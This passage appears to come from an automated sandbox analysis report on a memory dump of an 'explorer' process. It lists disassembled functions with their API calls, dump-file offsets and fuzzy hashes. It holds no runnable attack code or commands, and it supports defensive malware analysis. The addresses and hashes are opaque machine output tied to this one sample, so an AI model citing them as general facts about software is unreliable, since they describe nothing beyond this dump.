                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                            • Part of subcall function 011BC4E0: _getptd.LIBCMT ref: 011BC4E4
                          • _getptd.LIBCMT ref: 011BB115
                          • _getptd.LIBCMT ref: 011BB123
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$_amsg_exit
                          • String ID: MOC$RCC$csm
                          • API String ID: 2610988583-2671469338
                          • Opcode ID: 9b1d25e41cb6f60ff9d10fea1865af2b516c1639544035d129adf6bb36f99700
                          • Instruction ID: a2814bf7033c923ab444bac8d543a65391a07bf2c6fa4951ee4c9c13dcaab320
                          • Opcode Fuzzy Hash: 9b1d25e41cb6f60ff9d10fea1865af2b516c1639544035d129adf6bb36f99700
                          • Instruction Fuzzy Hash: 7EE01A3AA04106CAD72E6B69E0853EC36A1FFA8B0BF86D061C25443700C7BC8580CA66
                          Function 011947C0 Relevance: 9.2, APIs: 6, Instructions: 245synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 2302018356-0
                          • Opcode ID: f49430829550468032db8019027c05be34a64d79151aecb5546c78de584d337c
                          • Instruction ID: e6ba5c277c94026cad34255658b413760d5742e2cb6160e8e9789cdc2ec0a1d3
                          • Opcode Fuzzy Hash: f49430829550468032db8019027c05be34a64d79151aecb5546c78de584d337c
                          • Instruction Fuzzy Hash: 8FE1E276209B80C6EB68CB18F4D53EAB7A0F794704F55012AD79E86BA4EB7CC147CB41
                          Function 011BDF08 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _getptd.LIBCMT ref: 011BDF27
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                            • Part of subcall function 011BDB44: _getptd.LIBCMT ref: 011BDB4E
                            • Part of subcall function 011BDB44: _amsg_exit.LIBCMT ref: 011BDBEB
                            • Part of subcall function 011BDC00: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,011BDF42,?,?,?,?,?,011BE0FF), ref: 011BDC2A
                            • Part of subcall function 011C06CC: malloc.LIBCMT ref: 011C06F7
                            • Part of subcall function 011C06CC: Sleep.KERNEL32(?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C), ref: 011C070A
                          • free.LIBCMT ref: 011BDFB2
                            • Part of subcall function 011BC600: RtlFreeHeap.NTDLL(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC616
                            • Part of subcall function 011BC600: _errno.LIBCMT ref: 011BC620
                            • Part of subcall function 011BC600: GetLastError.KERNEL32(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC628
                          • _lock.LIBCMT ref: 011BDFE2
                          • free.LIBCMT ref: 011BE085
                          • free.LIBCMT ref: 011BE0B1
                          • _errno.LIBCMT ref: 011BE0B6
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                          • String ID:
                          • API String ID: 3894533514-0
                          • Opcode ID: 73e5fff96fc2ff2ac652b7bf0c36a42a1b1abcda39ba731aff748bc9adf327a5
                          • Instruction ID: 928c58faa11619feaf253ddb8e7c857bf3fed03b0c6e32ccc422f72af1a3858d
                          • Opcode Fuzzy Hash: 73e5fff96fc2ff2ac652b7bf0c36a42a1b1abcda39ba731aff748bc9adf327a5
                          • Instruction Fuzzy Hash: 4F41F03230568186EB1D9F25E4C03EEBBA1F794B88F18812ACB5A47365CF7DD442C751
                          Function 011BF2A4 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF2BD
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF314
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF34F
                          • free.LIBCMT ref: 011BF35C
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF367
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,011B99A0), ref: 011BF375
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                          • String ID:
                          • API String ID: 517548149-0
                          • Opcode ID: 563162d2e5260f89e2bfbf515d72d6f960428c1aed3f702d6255aeff5e47df9e
                          • Instruction ID: b479a2ae720b8a3c34485e75ce9e82b77fe2ea351c58702e59df18209982bc2b
                          • Opcode Fuzzy Hash: 563162d2e5260f89e2bfbf515d72d6f960428c1aed3f702d6255aeff5e47df9e
                          • Instruction Fuzzy Hash: 39219536609B8186EB289F26F8947ADB7A5F789FD0F484014DF8A07B68DF38C051C704
                          Function 01199400 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011994B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994C7
                            • Part of subcall function 011994B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994F1
                            • Part of subcall function 011994B0: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199522
                            • Part of subcall function 011994B0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199535
                            • Part of subcall function 011994B0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 0119958D
                            • Part of subcall function 011994B0: CoTaskMemFree.COMBASE(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199598
                          • GetFileAttributesW.KERNEL32 ref: 01199428
                          • LocalFree.KERNEL32 ref: 0119943E
                          • _LDint.LIBCPMTD ref: 01199454
                          • GetFileAttributesW.KERNEL32 ref: 01199475
                          • LocalFree.KERNEL32 ref: 0119948B
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AllocAttributesFile$DintFolderKnownPathTasklstrlen
                          • String ID:
                          • API String ID: 648754141-0
                          • Opcode ID: 92975d3bb36ba0aeba0f1b4d3f486a6c4df3aa1619a9ce175c1827031b21ed49
                          • Instruction ID: a79a482bcf2fb0fa2dca7ce644399299365b40ab355d9acf0684602cc7b50f4f
                          • Opcode Fuzzy Hash: 92975d3bb36ba0aeba0f1b4d3f486a6c4df3aa1619a9ce175c1827031b21ed49
                          • Instruction Fuzzy Hash: 0511BA72128A48C6EB29AF14E58439E77A0F7C875DF401629E6DE87768CF7DC185CB01
                          Function 011BAD14 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD1E
                          • FlsGetValue.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD2C
                          • SetLastError.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD84
                            • Part of subcall function 011C074C: Sleep.KERNEL32(?,?,00000000,011BAD47,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011C0791
                          • FlsSetValue.KERNEL32(?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BAD58
                          • free.LIBCMT ref: 011BAD7B
                            • Part of subcall function 011BAC5C: _lock.LIBCMT ref: 011BACB0
                            • Part of subcall function 011BAC5C: _lock.LIBCMT ref: 011BACCF
                          • GetCurrentThreadId.KERNEL32 ref: 011BAD6C
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                          • String ID:
                          • API String ID: 3106088686-0
                          • Opcode ID: 8c2eb824bbaec741b9fcf627379a17a0dfd026b0b42dc5b97bdda3fb3bb86d54
                          • Instruction ID: b44352471d23c770c0c69c64c7aba0ebacf59dfc5311abfcdb97d6cca7a046c6
                          • Opcode Fuzzy Hash: 8c2eb824bbaec741b9fcf627379a17a0dfd026b0b42dc5b97bdda3fb3bb86d54
                          • Instruction Fuzzy Hash: 55016235201B4187EB0DAF65E8D83E86262EF88BA9F084228CA2A03390EF3CD445C610
                          Function 011A7700 Relevance: 9.0, APIs: 6, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • _LDint.LIBCPMTD ref: 011A773B
                          • GetFileAttributesW.KERNEL32 ref: 011A775C
                          • LocalFree.KERNEL32 ref: 011A776C
                          • LocalFree.KERNEL32 ref: 011A7777
                          • LocalFree.KERNEL32 ref: 011A7789
                          • LocalFree.KERNEL32 ref: 011A7794
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Allocwnsprintf$AttributesDintFile
                          • String ID:
                          • API String ID: 3933031913-0
                          • Opcode ID: 5a3f21046453fb594ac3c22c22ea46263e7262b2553866b0b6947fcfb57de3b6
                          • Instruction ID: 4a0d7451d04d12ccc6baab982e25b4d8b871113a4ea761344aa72ca8ef3c1426
                          • Opcode Fuzzy Hash: 5a3f21046453fb594ac3c22c22ea46263e7262b2553866b0b6947fcfb57de3b6
                          • Instruction Fuzzy Hash: D901A176128E4482D768EF25E89439A7771F7C8798F400625E69E87668CF7DC685CF00
                          Function 011BB98C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _getptd.LIBCMT ref: 011BB9BD
                            • Part of subcall function 011BAD98: _amsg_exit.LIBCMT ref: 011BADAE
                          • _getptd.LIBCMT ref: 011BB9DB
                          • _CallSETranslator.LIBCMT ref: 011BBA23
                            • Part of subcall function 011B88B8: _getptd.LIBCMT ref: 011B88DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CallTranslator_amsg_exit
                          • String ID: MOC$RCC
                          • API String ID: 1374396951-2084237596
                          • Opcode ID: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                          • Instruction ID: b56089953b6927eaecb7f7e4673625f74b5c9bc653a3ddc5d9b48d7837f00c35
                          • Opcode Fuzzy Hash: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                          • Instruction Fuzzy Hash: 9951BD72608AC19ACF38DB19E5D07EDB760FB81B89F494526CB8E47A18DB78C152C704
                          Function 011A43B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                          • String ID: d
                          • API String ID: 1024630845-2564639436
                          • Opcode ID: 5ab9eb568d4970431e599d71f77821e3a37296d5731ef130ea2c4c62f91cd5f7
                          • Instruction ID: ec013a65c008e2823bcef2bdf9d15e50286d087c3ad3cf1f5f3286024b895580
                          • Opcode Fuzzy Hash: 5ab9eb568d4970431e599d71f77821e3a37296d5731ef130ea2c4c62f91cd5f7
                          • Instruction Fuzzy Hash: D251EA32308A8181EEB8CB48F4E57F5A361E7E4705F821626D68E86BA5EF7CC1958744
                          Function 011A43FE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 971639600-2564639436
                          • Opcode ID: 8552a47e95c20424504c3f48d4cec9fa28fd12cd46a885d93aa6cb29f0a44e10
                          • Instruction ID: 81f010009b82bd3d3e4663b1a2758240d005b6ab37bb9fcbfa098949a95678d9
                          • Opcode Fuzzy Hash: 8552a47e95c20424504c3f48d4cec9fa28fd12cd46a885d93aa6cb29f0a44e10
                          • Instruction Fuzzy Hash: 3E51DA72308E8081EEB8DB49F4E53F56361EBE4701F821626968EC6BA4EF7CC1958644
                          Function 011A3B29 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 971639600-2564639436
                          • Opcode ID: 4ed1b81e74a60f9e53a3f8c8e5f8ff9de3f1677f8acc2fe881c829a5b2298539
                          • Instruction ID: 10e5887adb066c7fe8bf2eb3c7388e12bbd1ad3c6dbe26ae27bd79386108f9c3
                          • Opcode Fuzzy Hash: 4ed1b81e74a60f9e53a3f8c8e5f8ff9de3f1677f8acc2fe881c829a5b2298539
                          • Instruction Fuzzy Hash: 3D41BC32305A0081EE78DB49F8E97B5A3A1F7E8B05F421627A64EC67A4EF3CC6558704
                          Function 011BB505 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$ExceptionRaise_amsg_exit
                          • String ID: csm
                          • API String ID: 4155239085-1018135373
                          • Opcode ID: e766e2aea064d0c1b3562efb748056da3fd218119ac93273f2242a5b12794b9b
                          • Instruction ID: ff15641e82727dc38842c992366a5fe7bf5e17d9319209c08f095f795b4ceff4
                          • Opcode Fuzzy Hash: e766e2aea064d0c1b3562efb748056da3fd218119ac93273f2242a5b12794b9b
                          • Instruction Fuzzy Hash: 51217E36204741C7DA39DF16E08079EB761FB99B65F414226CF9A03B94CB39D586CB05
                          Function 011B9030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _callnewh.LIBCMT ref: 011B903E
                          • malloc.LIBCMT ref: 011B904A
                            • Part of subcall function 011BC7A8: _FF_MSGBANNER.LIBCMT ref: 011BC7D8
                            • Part of subcall function 011BC7A8: HeapAlloc.KERNEL32(?,?,?,011C06FC,?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5), ref: 011BC7FD
                            • Part of subcall function 011BC7A8: _callnewh.LIBCMT ref: 011BC816
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC821
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC82C
                          • std::exception::exception.LIBCMT ref: 011B90B7
                          • type_info::_Type_info_dtor.LIBCMT ref: 011B90ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _callnewh_errno$AllocHeapType_info_dtormallocstd::exception::exceptiontype_info::_
                          • String ID: bad allocation
                          • API String ID: 1736788397-2104205924
                          • Opcode ID: c96244e9f482b777b6cf6b46924f9183bb55c1782275ffe7a1cfa5c86aa232a5
                          • Instruction ID: 13a3fa40f9b82cceedd4d644f7478e2a24f198967065db269ec838d45e6fa0b4
